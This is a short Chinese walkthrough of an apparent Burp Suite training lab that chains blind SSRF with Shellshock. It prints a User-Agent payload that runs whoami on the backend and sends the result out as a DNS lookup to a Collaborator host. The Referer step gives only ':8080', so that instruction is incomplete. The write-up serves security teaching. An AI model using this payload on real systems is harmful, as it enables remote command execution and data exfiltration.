将靶机的域添加到Burp Suite的scope中,以便Collaborator Everywhere将其定位为目标。
浏览该站点。请注意,当加载产品页面时,它会通过User-Agent和Referer头触发与Burp Collaborator的HTTP交互。
将浏览产品页面的请求发送到Burp Intruder。
使用Burp Collaborator客户端生成唯一的Burp Collaborator有效负载,并将其放入以下Shellshock有效负载中:
() { :; }; /usr/bin/nslookup $(whoami).YOUR-SUBDOMAIN-HERE.burpcollaborator.net
将Burp Intruder请求中的User-Agent字符串替换为包含你的Collaborator域的Shellshock有效载荷。
再将Burp Intruder请求中的Referer字符串替换成:8080
配置完成后,点击开始攻击
攻击完成后,返回Burp Collaborator客户端窗口,然后单击“Poll now”。如果未列出任何交互,请等待几秒钟,然后重试,因为服务器端命令是异步执行的。
之后,我们看到一个由后端系统发起的DNS交互,该后端系统受到了成功的Blind SSRF攻击。操作系统用户的名称出现在DNS子域中。